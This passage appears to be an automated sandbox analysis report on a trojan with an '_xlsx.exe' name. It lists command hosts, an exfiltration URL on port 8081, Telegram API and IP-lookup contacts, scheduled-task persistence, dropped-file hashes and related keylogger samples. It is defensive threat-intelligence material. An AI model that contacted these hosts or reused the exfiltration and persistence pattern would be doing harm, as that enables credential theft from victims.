http://varders.kozow.com:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://aborters.duckdns.org:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.000000000307B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003073000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003193000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002FC9000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000030E7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000A.00000002.1419410557.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3808408989.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004311000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3808451526.0000000004023000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003051000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3796978484.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528049
Start date and time:	2024-10-07 14:51:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe renamed because original name is a hash value
Original Sample Name:	TEKLF TALEP VE FYAT TEKLF_xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 193 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, PID 7944 because it is empty
Execution Graph export aborted for target YzkHZRBcm.exe, PID 6504 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Simulations

Behavior and APIs

Time	Type	Description
08:52:19	API Interceptor	8325370x Sleep call for process: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe modified
08:52:20	API Interceptor	27x Sleep call for process: powershell.exe modified
08:52:23	API Interceptor	6151187x Sleep call for process: YzkHZRBcm.exe modified
14:52:21	Task Scheduler	Run new task: YzkHZRBcm path: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	e4L9TXRBhB.exe	Get hash	malicious	XWorm	Browse
188.114.96.3	RFQ 245801.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF
	74qgPmarBM.exe	Get hash	malicious	Pony	Browse	kuechenundmehr.com/x.htm
	PURCHASE ORDER-6350.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/ttiz/
	http://revexhibition.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	revexhibition.pages.dev/favicon.ico
	http://meta.case-page-appeal.eu/community-standard/112225492204863/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	http://www.tkmall-wholesale.com/	Get hash	malicious	Unknown	Browse	www.tkmall-wholesale.com/
	c1#U09a6.exe	Get hash	malicious	Unknown	Browse	winfileshare.com/ticket_line/llb.php
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	1tstvk3Sls.exe	Get hash	malicious	RHADAMANTHYS	Browse	microsoft-rage.world/Api/v3/qjqzqiiqayjq

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.97.3
	#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.8.169
	#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
api.telegram.org	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	e4L9TXRBhB.exe	Get hash	malicious	XWorm	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	Payment.vbs	Get hash	malicious	FormBook	Browse	188.114.96.3
	PAYMENT SPECIFIKACIJA 364846637-pdf.vbs	Get hash	malicious	Remcos	Browse	188.114.97.3
	RFQ 245801.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	original.eml	Get hash	malicious	Tycoon2FA	Browse	188.114.96.3
	https://globalairt.com/arull.php?7088797967704b536932307466507a53354b54456b744b3872584b3037555338375031633872445172564277413d1	Get hash	malicious	Unknown	Browse	104.17.25.14
	74qgPmarBM.exe	Get hash	malicious	Pony	Browse	188.114.96.3
	http://twbcompany.com	Get hash	malicious	Unknown	Browse	104.21.7.183
	https://danielvasconcellos.com.br/cliente2024	Get hash	malicious	Phisher	Browse	188.114.97.3
	SecuriteInfo.com.Win64.Evo-gen.20301.32747.exe	Get hash	malicious	Unknown	Browse	104.26.0.5
	https://bono-sicherheitstechniksharefile.btn-ebikes.com/	Get hash	malicious	HtmlDropper	Browse	104.18.95.41
UTMEMUS	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	132.226.8.169
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	jHSDuYLeUl.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	132.226.8.169
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.96.3
	#Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	movimiento_INGDIRECT.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	Payment.vbs	Get hash	malicious	FormBook	Browse	149.154.167.220
	PAYMENT SPECIFIKACIJA 364846637-pdf.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	https://bono-sicherheitstechniksharefile.btn-ebikes.com/	Get hash	malicious	HtmlDropper	Browse	149.154.167.220
	Portal.msi	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://46.27.141.62	Get hash	malicious	Unknown	Browse	149.154.167.220
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.log

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YzkHZRBcm.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:fLHxvIIwLgZ2KRHWLOugss
MD5:	25321E5EF46D4B6586B432EDE14CDFB7
SHA1:	7B04466E0869735444E88F5F99045A021E104D5B
SHA-256:	D01CD798290DF4649DC4747E1130281BCB90400C1BABA2727D819D2626CCE70B
SHA-512:	4C5A5AEBCCF0426B10C11CAC0E2B935030FE539EF3582BC6AE4CCF052A9A7C6C35F3B8409123F59BDC7F0C35ABB9B433A4FAFFA50F856197A0B4712C8283BD40
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bn3unq5.hm4.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

